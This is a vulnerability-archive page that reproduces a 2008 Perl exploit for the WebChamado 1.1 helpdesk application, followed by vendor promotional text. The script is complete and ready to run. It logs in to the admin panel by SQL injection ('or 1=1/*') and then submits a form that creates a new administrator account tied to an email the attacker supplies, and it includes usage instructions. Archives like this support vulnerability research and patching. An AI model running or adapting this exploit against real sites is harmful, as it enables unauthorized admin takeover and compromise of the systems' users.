Lucene search
K

webchamado-admin.txt

🗓️ 13 Jun 2008 00:00:00Reported by CWH UndergroundType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

WebChamado 1.1 Arbitrary Add Admin Exploit. Allows unauthorized users to gain admin privileges and retrieve email passwords

Code
`#!/usr/bin/perl  
#============================================  
# WebChamado 1.1 Arbitrary Add Admin Exploit  
#============================================  
#  
# ,--^----------,--------,-----,-------^--,  
# | ||||||||| `--------' | O .. CWH Underground Hacking Team ..  
# `+---------------------------^----------|  
# `\_,-------, _________________________|  
# / XXXXXX /`| /  
# / XXXXXX / `\ /  
# / XXXXXX /\______(  
# / XXXXXX /   
# / XXXXXX /  
# (________(   
# `------'  
#  
#AUTHOR : CWH Underground  
#DATE : 12 June 2008  
#SITE : www.citec.us  
#  
#  
#####################################################  
#APPLICATION : WebChamado  
#VERSION : 1.1  
#DOWNLOAD : http://downloads.sourceforge.net/webchamado  
######################################################  
#  
#Note: magic_quotes_gpc = off  
#  
#This Exploit will Add user to administrator's privilege and you will get password from email..  
  
  
  
use LWP;  
use HTTP::Request;  
use HTTP::Cookies;  
  
if ($#ARGV + 1 != 3)  
{  
print "\n==============================================\n";  
print " WebChamado 1.1 Arbitrary Add Admin Exploit \n";  
print " \n";  
print " Discovered By CWH Underground \n";  
print "==============================================\n";  
print " \n";  
print " \n";   
print "Usage: ./xpl-webchamado.pl <WebChamado URL> <user> <email>\n";  
print "Ex. ./xpl-webchamado.pl http://www.target.com/WebChamado/ cwhunderground cwh\@cwh.com\n";  
exit();  
}  
  
$cmsurl = $ARGV[0];  
$user = $ARGV[1];  
$mail = $ARGV[2];  
  
  
$loginurl = $cmsurl."admin/index.php";  
$adduserurl = $cmsurl."admin/corpo.php?menuadmin_responsavel=S&rsp_tipusr=U";  
$post_content = "rsp_tipusr=U&rsp_nome=".$user."&rsp_codund=01&rsp_coddep=31&rsp_codfun=46&rsp_eml=".$mail."&rsp_adm=1&rsp_mst=S&rsp_btnresponsavel=Confirmar";  
  
print "\n..::Login Page URL::..\n";  
print "$loginurl\n";  
print "\n..::Add User Page URL::..\n";  
print "$adduserurl\n\n";  
  
$ua = LWP::UserAgent->new;  
$ua->cookie_jar(HTTP::Cookies->new);  
  
$request = HTTP::Request->new (POST => $loginurl);  
$request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7');  
$request->content_type ('application/x-www-form-urlencoded');  
$request->content ('eml=\') or 1=1/*&pas=masteradm&btn=Enviar');  
  
$response = $ua->request($request);  
  
$content = $response->content;  
  
if ($content =~ /index_ok/)  
{  
print "Login Success !!!\n\n";  
}  
else  
{  
print "Login Failed !!!\n\n";  
exit();  
}  
  
$request = HTTP::Request->new (POST => $adduserurl);  
$request->content_type ('application/x-www-form-urlencoded');  
$request->content ($post_content);  
$response = $ua->request($request);  
  
$content = $response->content;  
  
if ($content =~ /$user.*ADM.*$mail/)  
{  
print "Exploit Completed !!!\n";  
}  
else  
{  
print "Exploit Failed !!!\n";  
}  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation